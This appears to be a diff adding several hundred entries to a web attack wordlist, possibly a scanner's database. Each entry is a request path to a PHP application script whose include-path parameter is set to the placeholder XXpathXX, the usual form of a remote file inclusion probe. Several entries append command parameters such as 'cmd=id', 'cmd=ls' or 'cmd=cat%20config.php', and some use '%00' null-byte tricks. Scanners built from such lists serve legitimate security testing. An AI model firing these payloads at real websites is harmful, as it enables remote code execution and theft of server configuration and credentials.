+/mod/liste/index.php?config[pathMod]=XXpathXX
+/mod/special/index.php?config[pathMod]=XXpathXX
+/mod/texte/index.php?config[pathMod]=XXpathXX
+/mod_membre/inscription.php?chemin=XXpathXX?
+/mod_phpalbum/sommaire_admin.php?chemin=XXpathXX?
+/modernbill/include/html/config.php?DIR=XXpathXX
+/modifyform.html?code=XXpathXX
+/mods/business_functions.php?GALLERY_BASEDIR=XXpathXX
+/mods/config/load.inc.php?moddir=XXpathXX?
+/mods/http/load.inc.php?moddir=XXpathXX?
+/mods/ui_functions.php?GALLERY_BASEDIR=XXpathXX
+/module/forum/forum.php?fd=XXpathXX=';
+/module/forum/main.php?id=1&main_dir=XXpathXX?&
+/modules.php?name=XXpathXX&file=article&sid=2
+/modules/4nAlbum/public/displayCategory.php?basepath=XXpathXX
+/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=XXpathXX
+/modules/Calendar/admin/update.php?calpath=XXpathXX?
+/modules/Calendar/calendar.php?calpath=XXpathXX?
+/modules/Calendar/scheme.php?calpath=XXpathXX?
+/modules/Discipline/CategoryBreakdownTime.php?FocusPath=XXpathXX
+/modules/Discipline/CategoryBreakdownTime.php?staticpath=XXpathXX
+/modules/Discipline/StudentFieldBreakdown.php?staticpath=XXpathXX
+/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
+/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
+/modules/My_eGallery/index.php?basepath=XXpathXX
+/modules/My_eGallery/public/displayCategory.php?basepath=XXpathXX
+/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=XXpathXX?
+/modules/NukeAI/util.php?AIbasedir=XXpathXX
+/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=XXpathXX
+/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
+/modules/abook/foldertree.php?baseDir==XXpathXX?
+/modules/addons/plugin.php?doc_root=XXpathXX
+/modules/admin/include/config.php?doc_root=XXpathXX
+/modules/admin/include/localize.php?doc_root=XXpathXX
+/modules/agendax/addevent.inc.php?agendax_path=XXpathXX&cmd=id
+/modules/bank/includes/design/main.inc.php?bank_data[root]=XXpathXX?
+/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=XXpathXX
+/modules/birstday/birst.php?exbb[home_path]=XXpathXX?
+/modules/birstday/profile_show.php?exbb[home_path]=XXpathXX?
+/modules/birstday/select.php?exbb[home_path]=XXpathXX?
+/modules/blocks/headerfile.php?system[path]=XXpathXX
+/modules/calendar/index.php?inc_dir=XXpathXX
+/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=XXpathXX?
+/modules/calendar/mod_calendar.php?absolute_path=XXpathXX?
+/modules/certinfo/index.php?full_path=XXpathXX
+/modules/character_roster/include.php?mod_root=XXpathXX?
+/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=XXpathXX?
+/modules/coppermine/themes/default/theme.php?THEME_DIR=XXpathXX
+/modules/downloads/lib/LM_Downloads.php?pathToIndex=XXpathXX
+/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
+/modules/emails/index.php?full_path=XXpathXX
+/modules/events/index.php?full_path=XXpathXX
+/modules/fax/index.php?full_path=XXpathXX
+/modules/files/blocks/latest_files.php?system[path]=XXpathXX
+/modules/files/index.php?full_path=XXpathXX
+/modules/files/list.php?full_path=XXpathXX
+/modules/filters/headerfile.php?system[path]=XXpathXX
+/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=XXpathXX?
+/modules/forums/blocks/latest_posts.php?system[path]=XXpathXX
+/modules/global/inc/content.inc.php?sIncPath=XXpathXX?
+/modules/groupadm/index.php?full_path=XXpathXX
+/modules/groups/headerfile.php?system[path]=XXpathXX
+/modules/guestbook/index.php?CONFIG[local_root]=XXpathXX?
+/modules/history/index.php?full_path=XXpathXX
+/modules/home.module.php?repmod=XXpathXX?
+/modules/horoscope/footer.php?xoopsConfig[root_path]=XXpathXX
+/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=XXpathXX
+/modules/info/index.php?full_path=XXpathXX
+/modules/links/blocks/links.php?system[path]=XXpathXX
+/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
+/modules/links/submit_links.php?rootdp=zZz&gsLanguage=XXpathXX
+/modules/log/index.php?full_path=XXpathXX
+/modules/mail/index.php?full_path=XXpathXX
+/modules/menu/headerfile.php?system[path]=XXpathXX
+/modules/messages/index.php?full_path=XXpathXX
+/modules/mod_as_category.php?mosConfig_absolute_path=XXpathXX
+/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=XXpathXX
+/modules/mod_calendar.php?absolute_path=XXpathXX
+/modules/mod_flatmenu.php?mosConfig_absolute_path=XXpathXX
+/modules/mod_mainmenu.php?mosConfig_absolute_path=XXpathXX
+/modules/mod_weather.php?absolute_path=XXpathXX?
+/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=XXpathXX?
+/modules/newbb_plus/config.php?bbPath[root_theme]=XXpathXX
+/modules/newbb_plus/votepolls.php?bbPath[path]=XXpathXX
+/modules/news/blocks/latest_news.php?system[path]=XXpathXX
+/modules/newusergreatings/pm_newreg.php?exbb[home_path]=XXpathXX?
+/modules/organizations/index.php?full_path=XXpathXX
+/modules/phones/index.php?full_path=XXpathXX
+/modules/pms/index.php?module_path=XXpathXX???
+/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
+/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
+/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=XXpathXX?
+/modules/presence/index.php?full_path=XXpathXX
+/modules/projects/index.php?full_path=XXpathXX
+/modules/projects/list.php?full_path=XXpathXX
+/modules/projects/summary.inc.php?full_path=XXpathXX
+/modules/punish/p_error.php?exbb[home_path]=XXpathXX?
+/modules/punish/profile.php?exbb[home_path]=XXpathXX?
+/modules/reports/index.php?full_path=XXpathXX
+/modules/search/index.php?full_path=XXpathXX
+/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX?
+/modules/settings/headerfile.php?system[path]=XXpathXX
+/modules/snf/index.php?full_path=XXpathXX
+/modules/syslog/index.php?full_path=XXpathXX
+/modules/tasks/index.php?full_path=XXpathXX
+/modules/tasks/searchsimilar.php?full_path=XXpathXX
+/modules/tasks/summary.inc.php?full_path=XXpathXX
+/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
+/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
+/modules/tml/block.tag.php?GLOBALS[PTH][classes]=XXpathXX
+/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=XXpathXX
+/modules/useradm/index.php?full_path=XXpathXX
+/modules/users/headerfile.php?system[path]=XXpathXX
+/modules/vWar_Account/includes/functions_common.php?vwar_root2=XXpathXX
+/modules/visitors2/include/config.inc.php?lvc_include_dir=XXpathXX?
+/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=XXpathXX
+/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=XXpathXX
+/modules/xfsection/modify.php?dir_module=XXpathXX
+/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=XXpathXX
+/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
+/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX?
+/modulistica/mdl_save.php?CLASSPATH=XXpathXX
+/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
+/moodle/admin/utfdbmigrate.php?cmd=XXpathXX
+/moosegallery/display.php?type=XXpathXX?&cmd=[command]
+/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=XXpathXX
+/moteur/moteur.php?chemin=XXpathXX?
+/movie_cls.php?full_path=XXpathXX
+/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
+/music/buycd.php?HTTP_DOCUMENT_ROOT=XXpathXX?
+/mutant_includes/mutant_functions.php?phpbb_root_path=XXpathXX
+/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=XXpathXX
+/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=XXpathXX
+/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
+/myphpcommander_path/system/lib/package.php?gl_root=XXpathXX?cmd
+/mysave.php?file=XXpathXX
+/naboard_pnr.php?skin=XXpathXX?
+/ncaster/admin/addons/archive/archive.php?adminfolder=XXpathXX
+/network_module_selector.php?path_prefix=XXpathXX
+/news.php?CONFIG[script_path]=XXpathXX?
+/news.php?config[root_ordner]=XXpathXX?&cmd=id
+/news.php?scriptpath=XXpathXX?
+/news.php?vwar_root=XXpathXX
+/news/include/createdb.php?langfile;=XXpathXX?
+/news/include/customize.php?l=XXpathXX?
+/news/newstopic_inc.php?indir=XXpathXX
+/news/scripts/news_page.php?script_path=XXpathXX?
+/newsadmin.php?action=XXpathXX
+/newsarchive.php?path_to_script=XXpathXX?&cmd=ls
+/newsfeeds/includes/aggregator.php?zf_path=XXpathXX
+/newsfeeds/includes/controller.php?zf_path=XXpathXX
+/newsletter/newsletter.php?waroot=XXpathXX
+/newsp/lib/class.Database.php?path=XXpathXX?
+/newticket.php?lang=XXpathXX
+/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=XXpathXX
+/noticias.php?inc=XXpathXX?
+/nucleus/plugins/skinfiles/index.php?DIR_LIBS=XXpathXX
+/nuke_path/iframe.php?file=XXpathXX
+/nukebrowser.php?filnavn=XXpathXX&filhead=XXpathXX&cmd=id
+/nuseo/admin/nuseo_admin_d.php?nuseo_dir=XXpathXX?
+/oaboard_en/forum.php?inc=XXpathXX
+/ocp-103/index.php?req_path=XXpathXX
+/ocs/include/footer.inc.php?fullpath=XXpathXX?
+/ocs/include/theme.inc.php?fullpath=XXpathXX?
+/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=XXpathXX?
+/olbookmarks-0.7.4/themes/test1.php?XXpathXX
+/oneadmin/adminfoot.php?path[docroot]=XXpathXX
+/oneadmin/blogger/sampleblogger.php?path[docroot]=XXpathXX?
+/oneadmin/config-bak.php?include_once=XXpathXX
+/oneadmin/config.php?path[docroot]=XXpathXX
+/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=XXpathXX?
+/online.php?config[root_ordner]=XXpathXX?&cmd=id
+/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=XXpathXX?
+/openi-admin/base/fileloader.php?config[openi_dir]=XXpathXX
+/openrat/themes/default/include/html/insert.inc.php?tpl_dir=XXpathXX???
+/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=XXpathXX
+/ops/gals.php?news_file=XXpathXX
+/order/login.php?svr_rootscript=XXpathXX
+/osData/php121/php121db.php?php121dir=XXpathXX%00
+/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=XXpathXX?
+/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=XXpathXX?
+/owimg.php3?path=XXpathXX
+/p-news.php?pn_lang=XXpathXX
+/pafiledb/includes/pafiledb_constants.php?module_root_path=XXpathXX
+/page.php?goto=XXpathXX
+/page.php?id=XXpathXX
+/panel/common/theme/default/header_setup.php?path[docroot]=XXpathXX
+/param_editor.php?folder=XXpathXX?
+/parse/parser.php?WN_BASEDIR=XXpathXX
+/patch/?language_id=XXpathXX
+/patch/tools/send_reminders.php?noSet=0&includedir=XXpathXX?
+/paypalipn/ipnprocess.php?INC=XXpathXX?
+/pda/pda_projects.php?offset=XXpathXX
+/phfito/phfito-post?SRC_PATH=XXpathXX
+/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=XXpathXX
+/photo_comment.php?toroot=XXpathXX
+/php-inc/log.inc.php?SKIN_URL=XXpathXX
+/php-include-robotsservices.php?page=XXpathXX
+/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
+/php.incs/common.inc.php?cm_basedir=XXpathXX?
+/php/init.gallery.php?include_class=XXpathXX/something
+/php121db.php?php121dir=XXpathXX%00
+/php4you.php?dir=XXpathXX?
+/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=XXpathXX?
+/phpBB2/shoutbox.php?phpbb_root_path=XXpathXX
+/phpCards.header.php?CardPath=XXpathXX?
+/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
+/phpMyChat.php3?=XXpathXX?cmd=id
+/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=XXpathXX?
+/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=XXpathXX?
+/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
+/phpbb/sendmsg.php?phpbb_root_path=XXpathXX
+/phpcalendar/includes/calendar.php?phpc_root_path=XXpathXX?
+/phpcalendar/includes/setup.php?phpc_root_path=XXpathXX?
+/phpdebug_PATH/test/debug_test.php?debugClassLocation=XXpathXX
+/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=XXpathXX
+/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=XXpathXX
+/phphd_downloads/common.php?phphd_real_path=XXpathXX
+/phphost_directoryv2/include/admin.php?rd=XXpathXX?
+/phphtml.php?htmlclass_path=XXpathXX
+/phpi/edit_top_feature.php?include_connection=XXpathXX
+/phpi/edit_topics_feature.php?include_connection=XXpathXX
+/phplib/site_conf.php?ordnertiefe=XXpathXX
+/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/module/referenz.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=XXpathXX
+/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=XXpathXX
+/phplinks/includes/smarty.php?full_path_to_public_program=XXpathXX
+/phporacleview/inc/include_all.inc.php?page_dir=XXpathXX?
+/phppc/poll.php?is_phppc_included=1&relativer_pfad=XXpathXX?
+/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=XXpathXX?
+/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=XXpathXX?
+/phpquickgallery/gallery_top.inc.php?textFile=XXpathXX
+/phpreactor/inc/polls.inc.php?pathtohomedir=XXpathXX?
+/phpreactor/inc/updatecms.inc.php?pathtohomedir=XXpathXX?
+/phpreactor/inc/users.inc.php?pathtohomedir=XXpathXX?
+/phpreactor/inc/view.inc.php?pathtohomedir=XXpathXX?
+/phpress/adisplay.php?lang=XXpathXX
+/phpunity-postcard.php?plgallery_epost=1&gallery_path=XXpathXX?
+/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=XXpathXX
+/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=XXpathXX
+/phpyabs/moduli/libri/index.php?Azione=XXpathXX
+/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=XXpathXX
+/playlist.php?phpbb_root_path=XXpathXX
+/plugin/HP_DEV/cms2.php?s_dir=XXpathXX?
+/plugin/gateway/gnokii/init.php?apps_path[plug]=XXpathXX?
+/plugins/1_Adressbuch/delete.php?folder=XXpathXX
+/plugins/BackUp/Archive.php?bkpwp_plugin_path=XXpathXX?
+/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=XXpathXX?
+/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=XXpathXX?
+/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=XXpathXX?
+/plugins/links/functions.inc?_CONF[path]=XXpathXX
+/plugins/polls/functions.inc?_CONF[path]=XXpathXX
+/plugins/rss_importer_functions.php?sitepath=XXpathXX?
+/plugins/safehtml/HTMLSax3.php?dir[plugins]=XXpathXX?
+/plugins/safehtml/safehtml.php?dir[plugins]=XXpathXX?
+/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/Import.Admin.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/LogView.Admin.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=XXpathXX
+/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=XXpathXX
+/plugins/staticpages/functions.inc?_CONF[path]=XXpathXX
+/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=XXpathXX
+/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=XXpathXX
+/plus.php?_pages_dir=XXpathXX?
+/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=XXpathXX?
+/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX
+/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX?
+/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/login.php?absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=XXpathXX
+/podcastgen1.0beta2/core/recent_list.php?absoluteurl=XXpathXX
+/poll/view.php?int_path=XXpathXX
+/pollvote.php?pollname=XXpathXX?&cmd=ls
+/pop.php?base=XXpathXX
+/popup_window.php?site_isp_root=XXpathXX?
+/port.php?content=XXpathXX
+/portal/includes/portal_block.php?phpbb_root_path=XXpathXX
+/portal/portal.php?phpbb_root_path=XXpathXX?
+/portfolio.php?id=XXpathXX
+/portfolio/commentaires/derniers_commentaires.php?rep=XXpathXX?
+/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=XXpathXX
+/prepare.php?xcart_dir=XXpathXX?
+/prepend.php?_PX_config[manager_path]=XXpathXX
+/preview.php?php_script_path=XXpathXX?&cmd=dir
+/principal.php?conteudo=XXpathXX
+/print.php?page=XXpathXX
+/print.php?pager=XXpathXX
+/print.php?print=XXpathXX?
+/process.php?DEFAULT_SKIN=XXpathXX
+/professeurs/index.php?repertoire_config=XXpathXX
+/profil.php?config[root_ordner]=XXpathXX?&cmd=id
+/projects/weatimages/demo/index.php?ini[langpack]=XXpathXX
+/promocms/newspublish/include.php?path[bdocroot]=XXpathXX
+/protection.php?logout_page=XXpathXX?
+/provider/auth.php?xcart_dir=XXpathXX?
+/psynch/nph-psa.exe?css=XXpathXX
+/psynch/nph-psf.exe?css=XXpathXX
+/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=XXpathXX?
+/public_html/modules/Forums/favorites.php?nuke_bb_root_path=XXpathXX?
+/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=XXpathXX
+/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=XXpathXX
+/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=XXpathXX?
+/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=XXpathXX?
+/qte_web.php?qte_web_path=XXpathXX?
+/quick_reply.php?phpbb_root_path=XXpathXX&mode=[file]
+/quickie.php?QUICK_PATH=XXpathXX?&cmd=id
+/random2.php?path_to_folder=XXpathXX
+/randshop/index.php?incl=XXpathXX?
+/rdf.php?page[path]=XXpathXX?&cmd=ls
+/reactivate.php?base_dir=XXpathXX
+/read.php?data=XXpathXX?
+/readmore.php?config["sipssys"]=XXpathXX
+/recent.php?insPath=XXpathXX
+/rechnung.php?_PHPLIB[libdir]=XXpathXX?
+/reconfig.php?GLOBALS[CLPath]=XXpathXX
+/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=XXpathXX
+/redirect.php?url=XXpathXX
+/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=XXpathXX
+/register.php?base_dir=XXpathXX
+/releasenote.php?mosConfig_absolute_path=XXpathXX
+/rempass.php?lang=XXpathXX
+/report.php?scriptpath=XXpathXX?
+/reports/who_r.php?bj=XXpathXX
+/resources/includes/class.Smarty.php?cfg[sys][base_path]=XXpathXX
+/ressourcen/dbopen.php?home=XXpathXX?
+/robotstats.inc.php?DOCUMENT_ROOT=XXpathXX?
+/root/public/code/cp_html2txt.php?page=XXpathXX
+/routines/fieldValidation.php?jssShopFileSystem=XXpathXX
+/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX
+/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX?
+/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX
+/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX?
+/rss.php?page[path]=XXpathXX?&cmd=ls
+/rss.php?phpraid_dir=XXpathXX
+/rss.php?premodDir=XXpathXX
+/rss2.php?page[path]=XXpathXX?&cmd=ls
+/run.php?dir=SHELL?&file=XXpathXX
+/s01.php?shopid=XXpathXX
+/s01.php?shopid=XXpathXX?
+/s02.php?shopid=XXpathXX?
+/s03.php?shopid=XXpathXX?
+/s04.php?shopid=XXpathXX?
+/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=XXpathXX
+/sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX
+/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX
+/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX?
+/sample/xls2mysql/parser_path=XXpathXX?
+/save.php?file_save=XXpathXX
+/saveserver.php?thisdir=XXpathXX
+/script//ident/index.php?path_inc=XXpathXX
+/script/_conf/core/common-tpl-vars.php?confdir=XXpathXX?
+/script/common.inc.php?path_inc=XXpathXX
+/script/gestion/index.php?path_inc=XXpathXX
+/script/ident/disconnect.php?path_inc=XXpathXX
+/script/ident/ident.inc.php?path_inc=XXpathXX
+/script/ident/identification.php?path_inc=XXpathXX
+/script/ident/loginliste.php?path_inc=XXpathXX
+/script/ident/loginmodif.php?path_inc=XXpathXX
+/script/index.php?path_inc=XXpathXX
+/script/init/createallimagecache.php?PATH_TO_CODE=XXpathXX
+/script/menu/menuadministration.php?path_inc=XXpathXX
+/script/menu/menuprincipal.php?path_inc=XXpathXX
+/script/param/param.inc.php?path_inc=XXpathXX
+/script/plugins/phpgacl/admin/index.php?path_inc=XXpathXX
+/script/template/index.php?main_page_directory=XXpathXX
+/script/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
+/script/tick/test.php?PATH_TO_CODE=XXpathXX
+/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=XXpathXX?
+/script_path/cms/classes/openengine/filepool.php?oe_classpath=XXpathXX?
+/script_path/installation/index.php?mosConfig_absolute_path=XXpathXX?
+/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=XXpathXX
+/scripts/check-lom.php?ETCDIR=XXpathXX
+/scripts/gallery.scr.php?GLOBALS[PTH][func]=XXpathXX?
+/scripts/lom_update.php?ETCDIR=XXpathXX
+/scripts/news.scr.php?GLOBALS[PTH][classes]=XXpathXX?
+/scripts/polls.scr.php?GLOBALS[PTH][classes]=XXpathXX?
+/scripts/rss.scr.php?GLOBALS[PTH][classes]=XXpathXX?
+/scripts/search.scr.php?GLOBALS[PTH][classes]=XXpathXX?
+/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX
+/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX?
+/scripts/weigh_keywords.php?ETCDIR=XXpathXX
+/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=XXpathXX?
+/search.php?config["sipssys"]=XXpathXX
+/search.php?id=XXpathXX
+/search.php?insPath=XXpathXX
+/search/submit.php?config["sipssys"]=XXpathXX
+/search_wA.php?LIBPATH=XXpathXX
+/searchbot.php?path=XXpathXX
+/security/include/_class.security.php?PHPSECURITYADMIN_PATH=XXpathXX
+/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=XXpathXX?
+/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=XXpathXX?
+/senetman/html/index.php?page=XXpathXX
+/services.php?page=XXpathXX
+/services/samples/inclusionService.php?CabronServiceFolder=XXpathXX%00
+/settings.php?P[includes]=XXpathXX
+/settings_sql.php?path=XXpathXX
+/setup/inc/database.php?tcms_administer_site=XXpathXX
+/setup/upgrader.php?RootDirectory=XXpathXX
+/sezhoo/SezHooTabsAndActions.php?IP=XXpathXX
+/shop/includes/header.inc.php?dateiPfad=XXpathXX
+/shop/index.php?action=XXpathXX?&cmd=cat%20config.php
+/shop/page.php?osCsid=XXpathXX?
+/shop/page.php?pageid=XXpathXX?
+/shoutbox.php?language=XXpathXX
+/shoutbox.php?root=XXpathXX?cmd=id
+/show.php?file=XXpathXX
+/show.php?id=XXpathXX
+/show.php?page=XXpathXX
+/show.php?path=XXpathXX
+/show_archives.php?cutepath=XXpathXX?
+/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=XXpathXX
+/sid=XXpathXX
+/signer/final.php?smiley=XXpathXX?
+/signin.php?sent=1&AMG_serverpath=XXpathXX
+/sinagb.php?fuss=XXpathXX
+/sinapis.php?fuss=XXpathXX
+/sitebar/Integrator.php?file=XXpathXX
+/sitebar/index.php?writerFile=XXpathXX
+/sitebuilder/admin/top.php?admindir=XXpathXX
+/sitemap.xml.php?dir[classes]=XXpathXX
+/skin/board/default/doctype.php?dir=XXpathXX
+/skin/dark/template.php?path=XXpathXX
+/skin/gold/template.php?path=XXpathXX
+/skin/html/table.php?pachtofile=XXpathXX
+/skin/original/template.php?path=XXpathXX
+/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=XXpathXX
+/skins/advanced/advanced1.php?pluginpath[0]=XXpathXX
+/skins/default.php?dir_inc=XXpathXX
+/skins/header.php?ote_home=XXpathXX
+/skins/phpchess/layout_admin_cfg.php?Root_Path=XXpathXX
+/skins/phpchess/layout_cfg.php?Root_Path=XXpathXX
+/skins/phpchess/layout_t_top.php?Root_Path=XXpathXX
+/skysilver/login.tpl.php?theme=XXpathXX?
+/slogin_lib.inc.php?slogin_path=XXpathXX?
+/smarty.php?xcart_dir=XXpathXX?
+/smarty/smarty_class.php?_smarty_compile_path=XXpathXX
+/smilies.php?config=XXpathXX
+/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX?
+/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=XXpathXX?
+/snort/base_stat_common.php?BASE_path=XXpathXX
+/social_game_play.php?path=XXpathXX?
+/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=XXpathXX
+/song.php?phpbb_root_path=XXpathXX
+/source.php?bibtexrootrel=XXpathXX?
+/source/mod/rss/channeledit.php?Codebase=XXpathXX
+/source/mod/rss/post.php?Codebase=XXpathXX
+/source/mod/rss/view.php?Codebase=XXpathXX
+/source/mod/rss/viewitem.php?Codebase=XXpathXX
+/sources/Admin/admin_cats.php?CONFIG[main_path]=XXpathXX
+/sources/Admin/admin_edit.php?CONFIG[main_path]=XXpathXX
+/sources/Admin/admin_import.php?CONFIG[main_path]=XXpathXX
+/sources/Admin/admin_templates.php?CONFIG[main_path]=XXpathXX
+/sources/functions.php?CONFIG[main_path]=XXpathXX
+/sources/help.php?CONFIG[main_path]=XXpathXX
